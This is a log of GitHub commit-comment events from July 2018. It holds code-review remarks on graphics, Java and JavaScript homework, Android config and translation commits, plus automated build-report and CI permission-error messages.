{"id":"7906035015","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564838,"position":56,"line":97,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"0f65b17c49a815b52e827ebccadfc7b47ca5428c","created_at":"2018-07-02T11:17:51Z","updated_at":"2018-07-02T11:17:51Z","author_association":"NONE","body":"turn loop body into a small function and unroll"}},"created_at":"2018-07-02T11:17:51Z"}
{"id":"7906035691","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564842,"position":75,"line":116,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"0f65b17c49a815b52e827ebccadfc7b47ca5428c","created_at":"2018-07-02T11:18:01Z","updated_at":"2018-07-02T11:18:01Z","author_association":"NONE","body":"turn loop body into a small function and unroll"}},"created_at":"2018-07-02T11:18:01Z"}
{"id":"7906041296","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29564850,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-02T11:19:22Z","updated_at":"2018-07-02T11:19:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T11:19:22Z"}
{"id":"7906047774","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/vrsttl"},"payload":{"comment":{"id":29564858,"position":null,"line":null,"path":null,"commit_id":"7a61a9ea41e2fe4bfc88544cdfd339801a57785e","created_at":"2018-07-02T11:20:54Z","updated_at":"2018-07-02T11:20:54Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-02T11:20:54Z"}
{"id":"7906049100","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564861,"position":68,"line":103,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"af3d17ee53e5852d9987814fdb9e232890556951","created_at":"2018-07-02T11:21:14Z","updated_at":"2018-07-02T11:21:14Z","author_association":"NONE","body":"this set-up might not work for Non Power of Two array sizes"}},"created_at":"2018-07-02T11:21:14Z"}
{"id":"7906049993","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564863,"position":88,"line":122,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"af3d17ee53e5852d9987814fdb9e232890556951","created_at":"2018-07-02T11:21:26Z","updated_at":"2018-07-02T11:21:26Z","author_association":"NONE","body":"this set-up might not work for Non Power of Two array sizes"}},"created_at":"2018-07-02T11:21:26Z"}
{"id":"7906051107","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564866,"position":68,"line":103,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"af3d17ee53e5852d9987814fdb9e232890556951","created_at":"2018-07-02T11:21:43Z","updated_at":"2018-07-02T11:21:43Z","author_association":"NONE","body":"*will not"}},"created_at":"2018-07-02T11:21:43Z"}
{"id":"7906051580","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564867,"position":88,"line":122,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"af3d17ee53e5852d9987814fdb9e232890556951","created_at":"2018-07-02T11:21:50Z","updated_at":"2018-07-02T11:21:50Z","author_association":"NONE","body":"*will not"}},"created_at":"2018-07-02T11:21:50Z"}
{"id":"7906054887","type":"CommitCommentEvent","actor":{"login":"hanyateng"},"repo":{"name":"hanyateng/try_git"},"payload":{"comment":{"id":29564890,"position":null,"line":null,"path":null,"commit_id":"e22445dcadd94cccddd89a9306eaf592ab830d2e","created_at":"2018-07-02T11:22:36Z","updated_at":"2018-07-02T11:22:36Z","author_association":"OWNER","body":"坚持努力 终将成功"}},"created_at":"2018-07-02T11:22:36Z"}
{"id":"7906055111","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/homework_1"},"payload":{"comment":{"id":29564891,"position":18,"line":16,"path":"src/main/java/ru/pavel/homework/Main.java","commit_id":"d8cdb88015ff48e68a50fea1fd0c189b2fc46c3f","created_at":"2018-07-02T11:22:39Z","updated_at":"2018-07-02T11:22:39Z","author_association":"NONE","body":"Вот это, кстати небезопасно.\r\nВы прекрасно получали - context.getBean(StudentController.class) Зачем переделали?)"}},"created_at":"2018-07-02T11:22:39Z"}
{"id":"7906056433","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/vrsttl"},"payload":{"comment":{"id":29564893,"position":23,"line":25,"path":"Week-07/Wednesday/matrev/index.js","commit_id":"ca5e3e3fa3c0177167ce038b1f9121380bfc4778","created_at":"2018-07-02T11:22:59Z","updated_at":"2018-07-02T11:22:59Z","author_association":"NONE","body":"`http://localhost:3000` should be in a separate variable"}},"created_at":"2018-07-02T11:22:59Z"}
{"id":"7906057275","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/homework_1"},"payload":{"comment":{"id":29564895,"position":13,"line":12,"path":"src/main/java/ru/pavel/homework/controller/StudentController.java","commit_id":"d8cdb88015ff48e68a50fea1fd0c189b2fc46c3f","created_at":"2018-07-02T11:23:11Z","updated_at":"2018-07-02T11:23:11Z","author_association":"NONE","body":"Это немножко плохим тоном счиатется, лучше передавать что-то дефолтное."}},"created_at":"2018-07-02T11:23:11Z"}
{"id":"7906060668","type":"CommitCommentEvent","actor":{"login":"pavlaras"},"repo":{"name":"Suicide-Squirrel/android_device_lge_g4-common-LOS"},"payload":{"comment":{"id":29564900,"position":null,"line":null,"path":null,"commit_id":"b7c29ad548e31b54b5bcc707084b4c8ee93a542d","created_at":"2018-07-02T11:23:56Z","updated_at":"2018-07-02T11:23:56Z","author_association":"NONE","body":"useless if its false. \r\nhttps://github.com/LineageOS/android_vendor_lineage/blob/bca9493c45fea1c08513dbf3e227245912f29221/config/BoardConfigLineage.mk#L2"}},"created_at":"2018-07-02T11:23:56Z"}
{"id":"7906061538","type":"CommitCommentEvent","actor":{"login":"Alucardhell"},"repo":{"name":"Alucardhell/Learning-Java-Programming"},"payload":{"comment":{"id":29564906,"position":null,"line":null,"path":null,"commit_id":"5322d0a9552e9e91d376f551e632df3e6cef3050","created_at":"2018-07-02T11:24:08Z","updated_at":"2018-07-02T11:24:08Z","author_association":"OWNER","body":".."}},"created_at":"2018-07-02T11:24:08Z"}
{"id":"7906063035","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/vrsttl"},"payload":{"comment":{"id":29564912,"position":null,"line":null,"path":null,"commit_id":"a60f226a110ba326a6202cbf8ebf94c5c4d57439","created_at":"2018-07-02T11:24:28Z","updated_at":"2018-07-02T11:24:28Z","author_association":"NONE","body":"vote property has just 3 cases: 1,0,-1"}},"created_at":"2018-07-02T11:24:28Z"}
{"id":"7906079655","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29564962,"position":null,"line":null,"path":null,"commit_id":"ebb7a2dd302632f23d922dc6227d9f41e70ac351","created_at":"2018-07-02T11:28:21Z","updated_at":"2018-07-02T11:28:21Z","author_association":"OWNER","body":"Automatic build report for commit ebb7a2dd302632f23d922dc6227d9f41e70ac351:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T11:28:21Z"}
{"id":"7906082053","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/UML_report"},"payload":{"comment":{"id":29564965,"position":null,"line":null,"path":null,"commit_id":"f7f40fbcc2fcf4518a16b06c960d90e44af38223","created_at":"2018-07-02T11:28:54Z","updated_at":"2018-07-02T11:28:54Z","author_association":"COLLABORATOR","body":"柴田\r\nアブストラクトクラスってなんでしたっけ？再確認しておいてください。"}},"created_at":"2018-07-02T11:28:54Z"}
{"id":"7906083407","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/DownTownScarf7"},"payload":{"comment":{"id":29564972,"position":113,"line":113,"path":"week-07/day-01/frontend/server.js","commit_id":"b6f7ffe5b3fe0d40d20d6625fb93bd20efa36674","created_at":"2018-07-02T11:29:13Z","updated_at":"2018-07-02T11:29:13Z","author_association":"NONE","body":"if or switch case, but please don't use both of them"}},"created_at":"2018-07-02T11:29:13Z"}
{"id":"7906085020","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29564980,"position":null,"line":null,"path":null,"commit_id":"7f62ed7ed4bb3874ad97a4e54f4f6b1fc91f23ea","created_at":"2018-07-02T11:29:35Z","updated_at":"2018-07-02T11:29:35Z","author_association":"OWNER","body":"Automatic build report for commit 7f62ed7ed4bb3874ad97a4e54f4f6b1fc91f23ea:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T11:29:35Z"}
{"id":"7906085979","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29564983,"position":null,"line":null,"path":null,"commit_id":"7f62ed7ed4bb3874ad97a4e54f4f6b1fc91f23ea","created_at":"2018-07-02T11:29:48Z","updated_at":"2018-07-02T11:29:48Z","author_association":"OWNER","body":"Automatic build report for commit 7f62ed7ed4bb3874ad97a4e54f4f6b1fc91f23ea:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T11:29:48Z"}
{"id":"7906086554","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/DownTownScarf7"},"payload":{"comment":{"id":29564986,"position":20,"line":20,"path":"week-07/day-02/giphy-api.js","commit_id":"15026db6511bc3e8b4c96c7df9bb867c856374dd","created_at":"2018-07-02T11:29:56Z","updated_at":"2018-07-02T11:29:56Z","author_association":"NONE","body":"voaa. nice"}},"created_at":"2018-07-02T11:29:56Z"}
{"id":"7906086635","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/homework_1"},"payload":{"comment":{"id":29564987,"position":93,"line":82,"path":"src/main/java/ru/pavel/homework/controller/StudentControllerImpl.java","commit_id":"d8cdb88015ff48e68a50fea1fd0c189b2fc46c3f","created_at":"2018-07-02T11:29:57Z","updated_at":"2018-07-02T11:29:57Z","author_association":"NONE","body":"Прекрасный вариант, где можно написать тернарной операцией."}},"created_at":"2018-07-02T11:29:57Z"}
{"id":"7906086692","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29564988,"position":null,"line":null,"path":null,"commit_id":"26a2026fb29257ed3cef52e2a619ba9825fae091","created_at":"2018-07-02T11:29:57Z","updated_at":"2018-07-02T11:29:57Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 674](https://travis-ci.org/per1234/arduino-ci-script/builds/399081721) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00674-001-tsv"}},"created_at":"2018-07-02T11:29:57Z"}
{"id":"7906087144","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29564990,"position":null,"line":null,"path":null,"commit_id":"26a2026fb29257ed3cef52e2a619ba9825fae091","created_at":"2018-07-02T11:30:04Z","updated_at":"2018-07-02T11:30:04Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 674](https://travis-ci.org/per1234/arduino-ci-script/builds/399081721) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00674"}},"created_at":"2018-07-02T11:30:04Z"}
{"id":"7906087315","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564994,"position":180,"line":214,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"0f65b17c49a815b52e827ebccadfc7b47ca5428c","created_at":"2018-07-02T11:30:07Z","updated_at":"2018-07-02T11:30:07Z","author_association":"NONE","body":"nice handling of overflow, I take it that this is equavalent to ETF_CLAMP ?"}},"created_at":"2018-07-02T11:30:07Z"}
{"id":"7906090511","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/homework_1"},"payload":{"comment":{"id":29565005,"position":1,"line":1,"path":"src/main/resources/locales/messages_ru.properties","commit_id":"d8cdb88015ff48e68a50fea1fd0c189b2fc46c3f","created_at":"2018-07-02T11:30:50Z","updated_at":"2018-07-02T11:30:50Z","author_association":"NONE","body":"А от если чиатется как UTF-8, то не обязательно писать \\u - можно просто русскими буквами."}},"created_at":"2018-07-02T11:30:50Z"}
{"id":"7906091363","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/DownTownScarf7"},"payload":{"comment":{"id":29565007,"position":10,"line":10,"path":"week-07/day-03/bookstore/script.js","commit_id":"bb4e51483965ba8ccde43a9dd8f56d72a10d732d","created_at":"2018-07-02T11:31:01Z","updated_at":"2018-07-02T11:31:01Z","author_association":"NONE","body":"console.log is okay for debuging, testing something, but later if you had the result, please delete it"}},"created_at":"2018-07-02T11:31:01Z"}
{"id":"7906093438","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/DownTownScarf7"},"payload":{"comment":{"id":29565009,"position":38,"line":38,"path":"week-07/day-03/bookstore/script.js","commit_id":"bb4e51483965ba8ccde43a9dd8f56d72a10d732d","created_at":"2018-07-02T11:31:30Z","updated_at":"2018-07-02T11:31:30Z","author_association":"NONE","body":"`http://localhost:3000` should be in a separate variable"}},"created_at":"2018-07-02T11:31:30Z"}
{"id":"7906094578","type":"CommitCommentEvent","actor":{"login":"BeingDhruv"},"repo":{"name":"sayon6860/JavBlockChain"},"payload":{"comment":{"id":29565014,"position":7,"line":39,"path":"src/javblockchain/BlockChain.java","commit_id":"8828c2b7014e6f784b2a8bf5763455e1aaefbee4","created_at":"2018-07-02T11:31:44Z","updated_at":"2018-07-02T11:31:44Z","author_association":"NONE","body":"for this watch out Block Shell by Daxell in GitHub\r\n"}},"created_at":"2018-07-02T11:31:44Z"}
{"id":"7906096341","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/DownTownScarf7"},"payload":{"comment":{"id":29565022,"position":9,"line":9,"path":"week-07/day-03/bookstore/server.js","commit_id":"e6349f12b6281560e6fd06fd6dc64386d466f526","created_at":"2018-07-02T11:32:08Z","updated_at":"2018-07-02T11:32:08Z","author_association":"NONE","body":"please use a new line before after this row"}},"created_at":"2018-07-02T11:32:08Z"}
{"id":"7906097380","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29565025,"position":113,"line":435,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T11:32:21Z","updated_at":"2018-07-02T11:32:21Z","author_association":"COLLABORATOR","body":"Надо посмотреть в интерфейсе. По-моему, это как раз тот момент, когда из одного описания параметра неясно, что именно произойдёт, когда галка снята/проставлена, поэтому нужно явно писать"}},"created_at":"2018-07-02T11:32:21Z"}
{"id":"7906099444","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29565033,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-02T11:32:48Z","updated_at":"2018-07-02T11:32:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T11:32:48Z"}
{"id":"7906099872","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/homework_1"},"payload":{"comment":{"id":29565034,"position":4,"line":14,"path":"src/test/resources/spring/context.xml","commit_id":"d8cdb88015ff48e68a50fea1fd0c189b2fc46c3f","created_at":"2018-07-02T11:32:54Z","updated_at":"2018-07-02T11:32:54Z","author_association":"NONE","body":"НУ и этот я бы тоже удалил бы."}},"created_at":"2018-07-02T11:32:54Z"}
{"id":"7906100088","type":"CommitCommentEvent","actor":{"login":"qlikossbuild"},"repo":{"name":"qlik-oss/core-website"},"payload":{"comment":{"id":29565037,"position":null,"line":null,"path":null,"commit_id":"20ed72491de784f0f2e4fc3df38d7b5ba5fabcb6","created_at":"2018-07-02T11:32:57Z","updated_at":"2018-07-02T11:32:57Z","author_association":"CONTRIBUTOR","body":"A generated website with your changes can be accessed here: https://doc-review.qlikcore.com/fixbrokenlinks. The website will automatically be updated if more commits are pushed to the branch."}},"created_at":"2018-07-02T11:32:57Z"}
{"id":"7906103069","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29565040,"position":null,"line":null,"path":null,"commit_id":"5a41d8e2fc0133f1422a67e499fb9d7fba3a6c7d","created_at":"2018-07-02T11:33:36Z","updated_at":"2018-07-02T11:33:36Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n{\n  \"AnyOf\": \\[\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n      \\]\n    },\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        {\n          \"AllOf\": \\[\n            \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            \"queue:task\\-group\\-id:taskcluster\\-github/anV3d4qhS7Cw\\-UPYFs746Q\",\n            \"queue:schedule\\-task:taskcluster\\-github/anV3d4qhS7Cw\\-UPYFs746Q/anV3d4qhS7Cw\\-UPYFs746Q\"\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n\nYou have the scopes:\n\n```\n\\[\n  \"assume:project:taskcluster:mozilla\\-github\\-repository\",\n  \"assume:repo:github.com/servo/servo:pull\\-request\",\n  \"notify:email:\\*\",\n  \"notify:irc\\-channel:\\*\",\n  \"notify:irc\\-user:\\*\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\\-windows\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/servo\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/win2012r2\",\n  \"queue:route:garbage.\\*\",\n  \"queue:route:index.garbage.\\*\",\n  \"queue:route:notify.email.\\*\",\n  \"queue:route:notify.irc\\-channel.\\*\",\n  \"queue:route:notify.irc\\-user.\\*\",\n  \"queue:scheduler\\-id:taskcluster\\-github\",\n  \"secrets:get:garbage/\\*\",\n  \"secrets:set:garbage/\\*\"\n\\]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": \\[\n    {\n      \"AnyOf\": \\[\n        {\n          \"AllOf\": \\[\n            \"queue:scheduler\\-id:taskcluster\\-github\",\n            {\n              \"AnyOf\": \\[\n                \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n              \\]\n            }\n          \\]\n        },\n        {\n          \"AnyOf\": \\[\n            \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            {\n              \"AllOf\": \\[\n                \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:task\\-group\\-id:taskcluster\\-github/anV3d4qhS7Cw\\-UPYFs746Q\",\n                \"queue:schedule\\-task:taskcluster\\-github/anV3d4qhS7Cw\\-UPYFs746Q/anV3d4qhS7Cw\\-UPYFs746Q\"\n              \\]\n            }\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n```\n----\nmethod:     createTask\nerrorCode:  InsufficientScopes\nstatusCode: 403\ntime:       2018-07-02T11:33:36.660Z\n\n</details>"}},"created_at":"2018-07-02T11:33:36Z"}
{"id":"7906103751","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/homework_1"},"payload":{"comment":{"id":29565041,"position":6,"line":15,"path":"src/test/java/ru/pavel/homework/config/TestConfiguration.java","commit_id":"29ceadba03fd383f784fa6798acb5d09e06f2b1f","created_at":"2018-07-02T11:33:44Z","updated_at":"2018-07-02T11:33:44Z","author_association":"NONE","body":"Ох ничего себе! Крутяк!) Мне нравится)"}},"created_at":"2018-07-02T11:33:44Z"}
{"id":"7906103766","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/test"},"payload":{"comment":{"id":29565042,"position":null,"line":null,"path":null,"commit_id":"32228279ecc43bc6ae2e3c17779f5c90bcdb8469","created_at":"2018-07-02T11:33:45Z","updated_at":"2018-07-02T11:33:45Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=6)"}},"created_at":"2018-07-02T11:33:45Z"}
{"id":"7906103971","type":"CommitCommentEvent","actor":{"login":"arthasSin"},"repo":{"name":"CMU-SAFARI/ramulator"},"payload":{"comment":{"id":29565043,"position":46,"line":343,"path":"src/Controller.h","commit_id":"cd96ed6a842d8c5bfb6153eb8698e41f48f53da0","created_at":"2018-07-02T11:33:47Z","updated_at":"2018-07-02T11:33:47Z","author_association":"MEMBER","body":"Thanks for the feedback. As a quick solution, you may implement a counter to track for how many cycles the readq is empty and drain the writes if the counter exceeds some threshold, even if there are not too many write requests in writeq."}},"created_at":"2018-07-02T11:33:47Z"}
{"id":"7906104585","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29565046,"position":null,"line":null,"path":null,"commit_id":"001fcaf0dfae2654d8c9d2a40ffcf0de76176ffa","created_at":"2018-07-02T11:33:54Z","updated_at":"2018-07-02T11:33:54Z","author_association":"OWNER","body":"Automatic build report for commit 001fcaf0dfae2654d8c9d2a40ffcf0de76176ffa:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-failure-lightgrey.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T11:33:54Z"}
{"id":"7906105365","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29565050,"position":null,"line":null,"path":null,"commit_id":"001fcaf0dfae2654d8c9d2a40ffcf0de76176ffa","created_at":"2018-07-02T11:34:05Z","updated_at":"2018-07-02T11:34:05Z","author_association":"OWNER","body":"Automatic build report for commit 001fcaf0dfae2654d8c9d2a40ffcf0de76176ffa:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-failure-lightgrey.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T11:34:05Z"}
{"id":"7906106145","type":"CommitCommentEvent","actor":{"login":"ThePiGuy0"},"repo":{"name":"Suicide-Squirrel/android_device_lge_g4-common-LOS"},"payload":{"comment":{"id":29565053,"position":null,"line":null,"path":null,"commit_id":"b7c29ad548e31b54b5bcc707084b4c8ee93a542d","created_at":"2018-07-02T11:34:13Z","updated_at":"2018-07-02T11:34:13Z","author_association":"COLLABORATOR","body":"I know. CM_CHARGER was opt-out whereas LINEAGE_CHARGER is opt-in. I wanted to make it obvious we didn't want it"}},"created_at":"2018-07-02T11:34:13Z"}
{"id":"7906113950","type":"CommitCommentEvent","actor":{"login":"martin-martin"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29565066,"position":10,"line":10,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T11:35:55Z","updated_at":"2018-07-02T11:35:55Z","author_association":"OWNER","body":"It is good practice to **remove all unused code** from a submission.\r\n\r\nIf there is something you want to leave in for a specific reason (e.g. to illustrate your thought process) that is fine and can be helpful for our learning process. However - if you do that I will require you to add **code comments** that explain **why** a certain piece of code is still in the document even if it doesn't execute."}},"created_at":"2018-07-02T11:35:55Z"}
{"id":"7906116293","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29565068,"position":61,"line":406,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T11:36:26Z","updated_at":"2018-07-02T11:36:26Z","author_association":"COLLABORATOR","body":"Авторы Самурая и Internet пишут с заглавной в других местах; но если мы так сделаем в русском, то это будет чистое старпёрство. Просто традиции капиталитализации могут отличаться в русском и английском. Плюс, segwit неминуемо станет нативным понятием, а такие пишутся строчными буквами"}},"created_at":"2018-07-02T11:36:26Z"}
{"id":"7906121878","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29565087,"position":null,"line":null,"path":null,"commit_id":"a1c05af66c601ff6c136f0d395382715c0ab6382","created_at":"2018-07-02T11:37:42Z","updated_at":"2018-07-02T11:37:42Z","author_association":"OWNER","body":"Automatic build report for commit a1c05af66c601ff6c136f0d395382715c0ab6382:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T11:37:42Z"}
{"id":"7906122995","type":"CommitCommentEvent","actor":{"login":"arrizer"},"repo":{"name":"boinx/i18n-strings-files"},"payload":{"comment":{"id":29565090,"position":null,"line":null,"path":null,"commit_id":"4e9f458df5fb2bf5b85d677ee21e516a97571ee3","created_at":"2018-07-02T11:37:57Z","updated_at":"2018-07-02T11:37:57Z","author_association":"NONE","body":"That change is required to use the module in node.js v10. Could you create a pull request so that it gets fixed in npm?"}},"created_at":"2018-07-02T11:37:57Z"}
